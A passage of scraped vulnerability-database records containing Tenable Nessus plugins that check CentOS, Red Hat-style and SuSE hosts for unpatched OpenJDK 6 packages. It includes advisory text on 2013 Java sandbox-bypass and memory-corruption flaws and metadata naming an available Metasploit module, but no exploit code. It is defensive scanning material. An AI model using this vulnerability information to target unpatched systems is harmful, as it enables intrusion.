reference:\"java-1.6.0-openjdk-javadoc-1.6.0.0-1.40.1.11.11.0.1.el5_9\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"java-1.6.0-openjdk-src-1.6.0.0-1.40.1.11.11.0.1.el5_9\")) flag++;\n\nif (rpm_check(release:\"EL6\", reference:\"java-1.6.0-openjdk-1.6.0.0-1.61.1.11.11.el6_4\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"java-1.6.0-openjdk-demo-1.6.0.0-1.61.1.11.11.el6_4\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"java-1.6.0-openjdk-devel-1.6.0.0-1.61.1.11.11.el6_4\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"java-1.6.0-openjdk-javadoc-1.6.0.0-1.61.1.11.11.el6_4\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"java-1.6.0-openjdk-src-1.6.0.0-1.61.1.11.11.el6_4\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"java-1.6.0-openjdk / java-1.6.0-openjdk-demo / etc\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-01T02:15:21", "bulletinFamily": "scanner", "description": "Updated java-1.6.0-openjdk packages that fix various security issues\nare now available for Red Hat Enterprise Linux 5 and 6.\n\nThe Red Hat Security Response Team has rated this update as having\nimportant security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThese packages provide the OpenJDK 6 Java Runtime Environment and the\nOpenJDK 6 Software Development Kit.\n\nMultiple flaws were discovered in the font layout engine in the 2D\ncomponent. An untrusted Java application or applet could possibly use\nthese flaws to trigger Java Virtual Machine memory corruption.\n(CVE-2013-1569, CVE-2013-2383, CVE-2013-2384)\n\nMultiple improper permission check issues were discovered in the\nBeans, Libraries, JAXP, and RMI components in OpenJDK. An untrusted\nJava application or applet could use these flaws to bypass Java\nsandbox restrictions. (CVE-2013-1558, CVE-2013-2422, CVE-2013-1518,\nCVE-2013-1557)\n\nThe previous default value of the java.rmi.server.useCodebaseOnly\nproperty permitted the RMI implementation to automatically load\nclasses from remotely specified locations. An attacker able to connect\nto an application using RMI could use this flaw to make the\napplication execute arbitrary code. (CVE-2013-1537)\n\nNote: The fix for CVE-2013-1537 changes the default value of the\nproperty to true, restricting class loading to the local CLASSPATH and\nlocations specified in the java.rmi.server.codebase property. Refer to\nRed Hat Bugzilla bug 952387 for additional details.\n\nThe 2D component did not properly process certain images. An untrusted\nJava application or applet could possibly use this flaw to trigger\nJava Virtual Machine memory corruption. (CVE-2013-2420)\n\nIt was discovered that the Hotspot component did not properly handle\ncertain intrinsic frames, and did not correctly perform MethodHandle\nlookups. An untrusted Java application or applet could use these flaws\nto bypass Java sandbox restrictions. (CVE-2013-2431, CVE-2013-2421)\n\nIt was discovered that JPEGImageReader and JPEGImageWriter in the\nImageIO component did not protect against modification of their state\nwhile performing certain native code operations. An untrusted Java\napplication or applet could possibly use these flaws to trigger Java\nVirtual Machine memory corruption. (CVE-2013-2429, CVE-2013-2430)\n\nThe JDBC driver manager could incorrectly call the toString() method\nin JDBC drivers, and the ConcurrentHashMap class could incorrectly\ncall the defaultReadObject() method. An untrusted Java application or\napplet could possibly use these flaws to bypass Java sandbox\nrestrictions. (CVE-2013-1488, CVE-2013-2426)\n\nThe sun.awt.datatransfer.ClassLoaderObjectInputStream class may\nincorrectly invoke the system class loader. An untrusted Java\napplication or applet could possibly use this flaw to bypass certain\nJava sandbox restrictions. (CVE-2013-0401)\n\nFlaws were discovered in the Network component", "modified": "2019-11-02T00:00:00", "id": "CENTOS_RHSA-2013-0770.NASL", "href": "https://www.tenable.com/plugins/nessus/66205", "published": "2013-04-25T00:00:00", "title": "CentOS 5 / 6 : java-1.6.0-openjdk (CESA-2013:0770)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2013:0770 and \n# CentOS Errata and Security Advisory 2013:0770 respectively.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(66205);\n script_version(\"1.15\");\n script_cvs_date(\"Date: 2019/10/02 15:30:18\");\n\n script_cve_id(\"CVE-2013-0401\", \"CVE-2013-1488\", \"CVE-2013-1518\", \"CVE-2013-1537\", \"CVE-2013-1557\", \"CVE-2013-1558\", \"CVE-2013-1569\", \"CVE-2013-2383\", \"CVE-2013-2384\", \"CVE-2013-2415\", \"CVE-2013-2417\", \"CVE-2013-2419\", \"CVE-2013-2420\", \"CVE-2013-2421\", \"CVE-2013-2422\", \"CVE-2013-2424\", \"CVE-2013-2426\", \"CVE-2013-2429\", \"CVE-2013-2430\", \"CVE-2013-2431\");\n script_bugtraq_id(58504, 58507, 59131, 59141, 59153, 59159, 59165, 59166, 59167, 59170, 59179, 59184, 59187, 59190, 59194, 59206, 59212, 59219, 59228, 59243);\n script_xref(name:\"RHSA\", value:\"2013:0770\");\n\n script_name(english:\"CentOS 5 / 6 : java-1.6.0-openjdk (CESA-2013:0770)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated java-1.6.0-openjdk packages that fix various security issues\nare now available for Red Hat Enterprise Linux 5 and 6.\n\nThe Red Hat Security Response Team has rated this update as having\nimportant security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThese packages provide the OpenJDK 6 Java Runtime Environment and the\nOpenJDK 6 Software Development Kit.\n\nMultiple flaws were discovered in the font layout engine in the 2D\ncomponent. An untrusted Java application or applet could possibly use\nthese flaws to trigger Java Virtual Machine memory corruption.\n(CVE-2013-1569, CVE-2013-2383, CVE-2013-2384)\n\nMultiple improper permission check issues were discovered in the\nBeans, Libraries, JAXP, and RMI components in OpenJDK. An untrusted\nJava application or applet could use these flaws to bypass Java\nsandbox restrictions. (CVE-2013-1558, CVE-2013-2422, CVE-2013-1518,\nCVE-2013-1557)\n\nThe previous default value of the java.rmi.server.useCodebaseOnly\nproperty permitted the RMI implementation to automatically load\nclasses from remotely specified locations. An attacker able to connect\nto an application using RMI could use this flaw to make the\napplication execute arbitrary code. (CVE-2013-1537)\n\nNote: The fix for CVE-2013-1537 changes the default value of the\nproperty to true, restricting class loading to the local CLASSPATH and\nlocations specified in the java.rmi.server.codebase property. Refer to\nRed Hat Bugzilla bug 952387 for additional details.\n\nThe 2D component did not properly process certain images. An untrusted\nJava application or applet could possibly use this flaw to trigger\nJava Virtual Machine memory corruption. (CVE-2013-2420)\n\nIt was discovered that the Hotspot component did not properly handle\ncertain intrinsic frames, and did not correctly perform MethodHandle\nlookups. An untrusted Java application or applet could use these flaws\nto bypass Java sandbox restrictions. (CVE-2013-2431, CVE-2013-2421)\n\nIt was discovered that JPEGImageReader and JPEGImageWriter in the\nImageIO component did not protect against modification of their state\nwhile performing certain native code operations. An untrusted Java\napplication or applet could possibly use these flaws to trigger Java\nVirtual Machine memory corruption. (CVE-2013-2429, CVE-2013-2430)\n\nThe JDBC driver manager could incorrectly call the toString() method\nin JDBC drivers, and the ConcurrentHashMap class could incorrectly\ncall the defaultReadObject() method. An untrusted Java application or\napplet could possibly use these flaws to bypass Java sandbox\nrestrictions. (CVE-2013-1488, CVE-2013-2426)\n\nThe sun.awt.datatransfer.ClassLoaderObjectInputStream class may\nincorrectly invoke the system class loader. An untrusted Java\napplication or applet could possibly use this flaw to bypass certain\nJava sandbox restrictions. (CVE-2013-0401)\n\nFlaws were discovered in the Network component's InetAddress\nserialization, and the 2D component's font handling. An untrusted Java\napplication or applet could possibly use these flaws to crash the Java\nVirtual Machine. (CVE-2013-2417, CVE-2013-2419)\n\nThe MBeanInstantiator class implementation in the OpenJDK JMX\ncomponent did not properly check class access before creating new\ninstances. An untrusted Java application or applet could use this flaw\nto create instances of non-public classes. (CVE-2013-2424)\n\nIt was discovered that JAX-WS could possibly create temporary files\nwith insecure permissions. A local attacker could use this flaw to\naccess temporary files created by an application using JAX-WS.\n(CVE-2013-2415)\n\nThis erratum also upgrades the OpenJDK package to IcedTea6 1.11.10.\nRefer to the NEWS file, linked to in the References, for further\ninformation.\n\nAll users of java-1.6.0-openjdk are advised to upgrade to these\nupdated packages, which resolve these issues. All running instances of\nOpenJDK Java must be restarted for the update to take effect.\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2013-April/019703.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?b8a54e60\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2013-April/019705.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?5d811142\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected java-1.6.0-openjdk packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Java Applet Driver Manager Privileged toString() Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:java-1.6.0-openjdk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:java-1.6.0-openjdk-demo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:java-1.6.0-openjdk-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:java-1.6.0-openjdk-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:java-1.6.0-openjdk-src\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/03/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/04/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/04/25\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/CentOS/release\");\nif (isnull(release) || \"CentOS\" >!< release) audit(AUDIT_OS_NOT, \"CentOS\");\nos_ver = pregmatch(pattern: \"CentOS(?: Linux)? release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"CentOS\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(5|6)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"CentOS 5.x / 6.x\", \"CentOS \" + os_ver);\n\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-5\", reference:\"java-1.6.0-openjdk-1.6.0.0-1.40.1.11.11.el5_9\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"java-1.6.0-openjdk-demo-1.6.0.0-1.40.1.11.11.el5_9\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"java-1.6.0-openjdk-devel-1.6.0.0-1.40.1.11.11.el5_9\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"java-1.6.0-openjdk-javadoc-1.6.0.0-1.40.1.11.11.el5_9\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"java-1.6.0-openjdk-src-1.6.0.0-1.40.1.11.11.el5_9\")) flag++;\n\nif (rpm_check(release:\"CentOS-6\", reference:\"java-1.6.0-openjdk-1.6.0.0-1.61.1.11.11.el6_4\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"java-1.6.0-openjdk-demo-1.6.0.0-1.61.1.11.11.el6_4\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"java-1.6.0-openjdk-devel-1.6.0.0-1.61.1.11.11.el6_4\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"java-1.6.0-openjdk-javadoc-1.6.0.0-1.61.1.11.11.el6_4\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"java-1.6.0-openjdk-src-1.6.0.0-1.61.1.11.11.el6_4\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"java-1.6.0-openjdk / java-1.6.0-openjdk-demo / etc\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-03T12:17:56", "bulletinFamily": "scanner", "description": "java-1_6_0-openjdk has been updated to version Icedtea6-1.12.5 which\nfixes several security issues.\n\nSecurity fixes\n\n - S6657673, CVE-2013-1518: Issues with JAXP\n\n - S7200507: Refactor Introspector internals\n\n - S8000724, CVE-2013-2417: Improve networking\n serialization\n\n - S8001031, CVE-2013-2419: Better font processing\n\n - S8001040, CVE-2013-1537: Rework RMI model\n\n - S8001322: Refactor deserialization\n\n - S8001329, CVE-2013-1557: Augment RMI logging\n\n - S8003335: Better handling of Finalizer thread\n\n - S8003445: Adjust JAX-WS to focus on API\n\n - S8003543, CVE-2013-2415: Improve processing of MTOM\n attachments\n\n - S8004261: Improve input validation\n\n - S8004336, CVE-2013-2431: Better handling of method\n handle intrinsic frames\n\n - S8004986, CVE-2013-2383: Better handling of glyph table\n\n - S8004987, CVE-2013-2384: Improve font layout\n\n - S8004994, CVE-2013-1569: Improve checking of glyph table\n\n - S8005432: Update access to JAX-WS\n\n - S8005943: (process) Improved Runtime.exec\n\n - S8006309: More reliable control panel operation\n\n - S8006435, CVE-2013-2424: Improvements in JMX\n\n - S8006790: Improve checking for windows\n\n - S8006795: Improve font warning messages\n\n - S8007406: Improve accessibility of AccessBridge\n\n - S8007617, CVE-2013-2420: Better validation of images\n\n - S8007667, CVE-2013-2430: Better image reading\n\n - S8007918, CVE-2013-2429: Better image writing\n\n - S8009063, CVE-2013-2426: Improve reliability of\n ConcurrentHashMap\n\n - S8009305, CVE-2013-0401: Improve AWT data transfer\n\n - S8009699, CVE-2013-2421: Methodhandle lookup\n\n - S8009814, CVE-2013-1488: Better driver management\n\n - S8009857, CVE-2013-2422: Problem with plugin\n\n - RH952389: Temporary files created with insecure\n permissions Backports\n\n - S7197906: BlockOffsetArray::power_to_cards_back() needs\n to handle > 32 bit shifts\n\n - S7036559: ConcurrentHashMap footprint and contention\n improvements\n\n - S5102804: Memory leak in Introspector.getBeanInfo(Class)\n for custom BeanInfo: Class param (with WeakCache from\n S6397609)\n\n - S6501644: sync LayoutEngine code structure to match ICU\n\n - S6886358: layout code update\n\n - S6963811: Deadlock-prone locking changes in Introspector\n\n - S7017324: Kerning crash in JDK 7 since ICU layout update\n\n - S7064279: Introspector.getBeanInfo() should release some\n resources in timely manner\n\n - S8004302: javax/xml/soap/Test7013971.java fails since\n jdk6u39b01\n\n - S7133220: Additional patches to JAXP 1.4.5 update 1 for\n 7u4 (partial for S6657673)\n\n - S8009530: ICU Kern table support broken Bug fixes\n\n - OJ3: Fix get_stack_bounds memory leak (alternate fix for\n S7197906)\n\n - PR1362: Fedora 19 / rawhide FTBFS SIGILL\n\n - PR1338: Remove dependence on libXp\n\n - PR1339: Simplify the rhino class rewriter to avoid use\n of concurrency\n\n - PR1336: Bootstrap failure on Fedora 17/18\n\n - PR1319: Correct #ifdef to #if\n\n - PR1402: Support glibc < 2.17 with AArch64 patch\n\n - Give xalan/xerces access to their own internal packages.\n New features\n\n - JAXP, JAXWS & JAF supplied as patches rather than\n drops to aid subsequent patching.\n\n - PR1380: Add AArch64 support to Zero", "modified": "2019-11-02T00:00:00", "id": "SUSE_11_JAVA-1_6_0-OPENJDK-130512.NASL", "href": "https://www.tenable.com/plugins/nessus/66538", "published": "2013-05-22T00:00:00", "title": "SuSE 11.2 Security Update : java-1_6_0-openjdk (SAT Patch Number 7718)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from SuSE 11 update information. The text itself is\n# copyright (C) Novell, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(66538);\n script_version(\"$Revision: 1.9 $\");\n script_cvs_date(\"$Date: 2013/11/18 01:35:30 $\");\n\n script_cve_id(\"CVE-2013-0401\", \"CVE-2013-1488\", \"CVE-2013-1518\", \"CVE-2013-1537\", \"CVE-2013-1557\", \"CVE-2013-1569\", \"CVE-2013-2383\", \"CVE-2013-2384\", \"CVE-2013-2415\", \"CVE-2013-2417\", \"CVE-2013-2419\", \"CVE-2013-2420\", \"CVE-2013-2421\", \"CVE-2013-2422\", \"CVE-2013-2424\", \"CVE-2013-2426\", \"CVE-2013-2429\", \"CVE-2013-2430\", \"CVE-2013-2431\");\n\n script_name(english:\"SuSE 11.2 Security Update : java-1_6_0-openjdk (SAT Patch Number 7718)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 11 host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"java-1_6_0-openjdk has been updated to version Icedtea6-1.12.5 which\nfixes several security issues.\n\nSecurity fixes\n\n - S6657673, CVE-2013-1518: Issues with JAXP\n\n - S7200507: Refactor Introspector internals\n\n - S8000724, CVE-2013-2417: Improve networking\n serialization\n\n - S8001031, CVE-2013-2419: Better font processing\n\n - S8001040, CVE-2013-1537: Rework RMI model\n\n - S8001322: Refactor deserialization\n\n - S8001329, CVE-2013-1557: Augment RMI logging\n\n - S8003335: Better handling of Finalizer thread\n\n - S8003445: Adjust JAX-WS to focus on API\n\n - S8003543, CVE-2013-2415: Improve processing of MTOM\n attachments\n\n - S8004261: Improve input validation\n\n - S8004336, CVE-2013-2431: Better handling of method\n handle intrinsic frames\n\n - S8004986, CVE-2013-2383: Better handling of glyph table\n\n - S8004987, CVE-2013-2384: Improve font layout\n\n - S8004994, CVE-2013-1569: Improve checking of glyph table\n\n - S8005432: Update access to JAX-WS\n\n - S8005943: (process) Improved Runtime.exec\n\n - S8006309: More reliable control panel operation\n\n - S8006435, CVE-2013-2424: Improvements in JMX\n\n - S8006790: Improve checking for windows\n\n - S8006795: Improve font warning messages\n\n - S8007406: Improve accessibility of AccessBridge\n\n - S8007617, CVE-2013-2420: Better validation of images\n\n - S8007667, CVE-2013-2430: Better image reading\n\n - S8007918, CVE-2013-2429: Better image writing\n\n - S8009063, CVE-2013-2426: Improve reliability of\n ConcurrentHashMap\n\n - S8009305, CVE-2013-0401: Improve AWT data transfer\n\n - S8009699, CVE-2013-2421: Methodhandle lookup\n\n - S8009814, CVE-2013-1488: Better driver management\n\n - S8009857, CVE-2013-2422: Problem with plugin\n\n - RH952389: Temporary files created with insecure\n permissions Backports\n\n - S7197906: BlockOffsetArray::power_to_cards_back() needs\n to handle > 32 bit shifts\n\n - S7036559: ConcurrentHashMap footprint and contention\n improvements\n\n - S5102804: Memory leak in Introspector.getBeanInfo(Class)\n for custom BeanInfo: Class param (with WeakCache from\n S6397609)\n\n - S6501644: sync LayoutEngine code structure to match ICU\n\n - S6886358: layout code update\n\n - S6963811: Deadlock-prone locking changes in Introspector\n\n - S7017324: Kerning crash in JDK 7 since ICU layout update\n\n - S7064279: Introspector.getBeanInfo() should release some\n resources in timely manner\n\n - S8004302: javax/xml/soap/Test7013971.java fails since\n jdk6u39b01\n\n - S7133220: Additional patches to JAXP 1.4.5 update 1 for\n 7u4 (partial for S6657673)\n\n - S8009530: ICU Kern table support broken Bug fixes\n\n - OJ3: Fix get_stack_bounds memory leak (alternate fix for\n S7197906)\n\n - PR1362: Fedora 19 / rawhide FTBFS SIGILL\n\n - PR1338: Remove dependence on libXp\n\n - PR1339: Simplify the rhino class rewriter to avoid use\n of concurrency\n\n - PR1336: Bootstrap failure on Fedora 17/18\n\n - PR1319: Correct #ifdef to #if\n\n - PR1402: Support glibc < 2.17 with AArch64 patch\n\n - Give xalan/xerces access to their own internal packages.\n New features\n\n - JAXP, JAXWS & JAF supplied as patches rather than\n drops to aid subsequent patching.\n\n - PR1380: Add AArch64 support to Zero\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=817157\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-0401.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-1488.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-1518.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-1537.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-1557.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-1569.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-2383.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-2384.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-2415.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-2417.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-2419.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-2420.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-2421.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-2422.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-2424.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-2426.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-2429.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-2430.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-2431.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply SAT patch number 7718.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Java Applet Driver Manager Privileged toString() Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:java-1_6_0-openjdk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:java-1_6_0-openjdk-demo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:java-1_6_0-openjdk-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/05/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/05/22\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)11\") audit(AUDIT_OS_NOT, \"SuSE 11\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SuSE 11\", cpu);\n\npl = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(pl) || int(pl) != 2) audit(AUDIT_OS_NOT, \"SuSE 11.2\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED11\", sp:2, cpu:\"i586\", reference:\"java-1_6_0-openjdk-1.6.0.0_b27.1.12.5-0.2.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:2, cpu:\"i586\", reference:\"java-1_6_0-openjdk-demo-1.6.0.0_b27.1.12.5-0.2.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:2, cpu:\"i586\", reference:\"java-1_6_0-openjdk-devel-1.6.0.0_b27.1.12.5-0.2.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:2, cpu:\"x86_64\", reference:\"java-1_6_0-openjdk-1.6.0.0_b27.1.12.5-0.2.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:2, cpu:\"x86_64\", reference:\"java-1_6_0-openjdk-demo-1.6.0.0_b27.1.12.5-0.2.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:2, cpu:\"x86_64\", reference:\"java-1_6_0-openjdk-devel-1.6.0.0_b27.1.12.5-0.2.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-03T12:13:00", "bulletinFamily": "scanner", "description": "Multiple flaws were discovered in the font layout engine in the 2D\ncomponent. An untrusted Java application or applet could possibly use\nthese flaws to trigger Java Virtual Machine memory corruption.\n(CVE-2013-1569, CVE-2013-2383, CVE-2013-2384)\n\nMultiple improper permission check issues were discovered in the\nBeans, Libraries, JAXP, and RMI components in OpenJDK. An untrusted\nJava application or applet could use these flaws to bypass Java\nsandbox restrictions. (CVE-2013-1558, CVE-2013-2422, CVE-2013-1518,\nCVE-2013-1557)\n\nThe previous default value of the java.rmi.server.useCodebaseOnly\nproperty permitted the RMI implementation to automatically load\nclasses from remotely specified locations. An attacker able to connect\nto an application using RMI could use this flaw to make the\napplication execute arbitrary code. (CVE-2013-1537)\n\nNote: The fix for CVE-2013-1537 changes the default value of the\nproperty to true, restricting class loading to the local CLASSPATH and\nlocations specified in the java.rmi.server.codebase property. Refer to\nRed Hat Bugzilla bug 952387 for additional details.\n\nThe 2D component did not properly process certain images. An untrusted\nJava application or applet could possibly use this flaw to trigger\nJava Virtual Machine memory corruption. (CVE-2013-2420)\n\nIt was discovered that the Hotspot component did not properly handle\ncertain intrinsic frames, and did not correctly perform MethodHandle\nlookups. An untrusted Java 